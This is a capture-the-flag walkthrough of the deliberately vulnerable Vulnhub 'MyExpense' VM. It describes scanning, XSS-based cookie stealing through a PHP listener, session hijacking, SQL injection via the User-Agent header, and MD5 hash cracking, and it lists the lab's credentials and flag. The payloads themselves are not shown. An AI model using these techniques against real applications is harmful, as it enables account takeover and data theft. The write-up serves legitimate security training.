My Expense Vulnhub Walkthrough
Md. Tajdar Alam Ansari
Reconnaissance:
MyExpense is a deliberately vulnerable web application that allows you to train in detecting and exploiting different web vulnerabilities. Unlike a more traditional “challenge” application (which allows you to train on a single specific vulnerability), MyExpense contains a set of vulnerabilities you need to exploit to achieve the whole scenario.
You are “Samuel Lamotte” and you have just been fired by your company “Furtura Business Informatique”. Unfortunately because of your hasty departure, you did not have time to validate your expense report for your last business trip, which still amounts to 750 € corresponding to a return flight to your last customer.
Fearing that your former employer may not want to reimburse you for this expense report, you decide to hack into the internal application called “MyExpense “ to manage employee expense reports.
So you are in your car, in the company carpark and connected to the internal Wi-Fi (the key has still not been changed after your departure). The application is protected by username/password authentication and you hope that the administrator has not yet modified or deleted your access.
Your credentials were: samuel/fzghn4lw
Once the challenge is done, the flag will be displayed on the application while being connected with your (samuel) account.
Link to the VM is: https://www.vulnhub.com/entry/myexpense-1,405/
Lab setup:
The machine is deployed on VirtualBox since in the website itself it is said to use VirtualBox rather than using VMware. It is done by just clicking the import button and selecting the MyExpense.ova image.
As we can see in the image above, the VM is up and running. Please make sure to configure its settings if the VM seems to be not working properly.
Scanning:
- Arp Scan
The next task followed by recon is scanning and enumeration.
Using the “arp” scan we will find out the IP of the VM. Use arp-scan -l to list the IP addresses of the devices connected to your Wi-Fi Access Point.
- Nmap Scan
Using nmap we need to find the list of services and the ports they are running on.
For that we need to put in the command nmap -sC -sV -A [IP of the machine]
Vulnerability Analysis:
We can see that the web port 80 is up and running. So we head on there and see what’s in the web page.
We can see that this website is entitled to some Futura Business Informatique.
Performing a dirb scan and then checking the results gives us these results.
Here we have the robots.txt directory which leads us to an admin page. Which shows us a list of user accounts.
Here we can see that the account of Samuel is inactive. We cannot activate it since it needs admin control. Let us try to create an account using Don’t have an account? button. But it blocks us every time so we need to inspect the element of the page using Ctrl+Shift+I and here we can see that the button param is set to diabled. So we need to enable it.
After enabling it, we can create our own account to check XSS vulnerability.
And we can see that it is XSS vulnerable.
So, the next thing we try to do is to activate the account of the user Samuel using a method popularly known as “Cookie Stealing”.
Exploitation:
To steal admin cookie we need to use php poisoning scripts to run into the webpage and return the cookies of the users back to our base machine.
For that to take place we need to first shut down our apache service using the command “ sudo service apache2 stop ” and then write a script in php to steal the cookies.
For the time being we will use this script to steal cookies and remember to save it as a .php file.
Now we need to run php services by the php file we created into /var/www/html/
We are going to do this by the following command
sudo php -S [Base/Local machine IP: Port number]
In this case for a web page we will be using Port 80
Now we also need to run a payload on the web page. For that we are going to use the payload below.
Now it is time for us to use the script on the webpage itself.
Now we head back to our terminal and wait for the cookies to be returned. And voila we have our admin cookie.
So our next task will be to edit the cookie using the cookie editor addon.
And now we have admin privileges.
Now we need to activate Samuel’s ID which is 11.
For the time being we will use this payload on the /admin/admin.php directory by creating a new account taking advantage of the XSS vulnerability.
We can now see that the id of Samuel has been activated.
The next thing for us to do is to login into Samuel’s account using the credentials given to us.
User: slamotte
Pass: fzghn4lw
Now we need to fix the things that Samuel needs to do. We have to click the tick mark completing his end of the work.
Heading to his personal information section gives us the name of his manager who is going to approve the work of Samuel. Using the cookie stealing method that we used earlier, we need to find out the cookie ID of the person named Manon Riviere.
Before that we are going to check if XSS still works on this page so we are going to make use of the comment box for that.
To our surprise it still works.
Now we need to find out the cookie ID of the person named Manon Riviere. To do this we just need to edit the name of the cookie and save it to the exact same location of the previous cookie stealer. Here we are only going to change the name of the .php file to save time and less effort in typing.
During this process we must not forget to change our local machine listener to intercept the new cookie ID. Going back to our terminal we can find that all the cookie IDs are intercepted.
Now we got a bunch of cookies. Cycling through each new ID gives us a different user. We need a hit and trial approach for this. Trying first Cookie ID gives a user until we finally find the ID of the manager.
Account of Manon is finally found.
Let’s wrap up the work for Samuel.
Let us now validate each reports.
Since all our work is validated. Let us now find the Admin credentials. For which we need to get a GET 200 request successful. Surfing through the networking tab under developer console we can get the instance of the request.
Let us use SQL injection into the database using the GET requests and the User-Agent parameter.
Finally we need a payload to send in as a get request.
Using the Inspector tab we get to know that the admin has id=2
Now all we need to do is run the exploit script.
After the script has completed the task we get the tables that we need in order to get admin credentials.
The database of tables can be found under the account of Manon. (I forgot to take a screenshot but it is right there on the dashboard).
Now we need to run a specific command to drop the tables of the user credentials database. Using this payload below.
Now as a result we get all user credentials. Just like that.
But there is one final step. All the users passwords are in hash format. For this we can either use HashCat, JohnTheRipper, HashCracker, HashDeep, but I am going to use Crack Station. Essentially any one is fine as long as it is working. I specifically use Crack Station due to habit. So, now let us copy the hash of Paul Baudouin since he appears to be the admin.
So we can see that the password is HackMe and the hash format is md5.
So, let’s get our work done and login to get the flag.
USER: pbaudoin
PASS: HackMe
Login to admin was successful.
And here we get the flag{H4CKY0URL1F3}
Conclusion:
This VM contains a lot of challenges for us to Pen Test. Such as XSS attacks, Cookie stealing, Source code modification, SQL injection, php poisoning, Hash Cracking and Privilege Escalation. Overall this was a fun VM which took me a lot of time to solve. Initially I was unable to solve it due to my blank knowledge over cookie stealing. But since I was allowed to access the youtube I watched this video https://www.youtube.com/watch?v=T1QEs3mdJoc of Cookie stealing by @Computerphile, which was of great help to me. Thanks a lot for reading my PoC on the VM on Vulnhub:
- Name: MyExpense: 1
- Date release: 7 Dec 2019
- Author: Sh4rpf0rc3
- Series: MyExpense
The link to this VM is present at the top of this PoC.
Thank you! Have a Hacky Day!
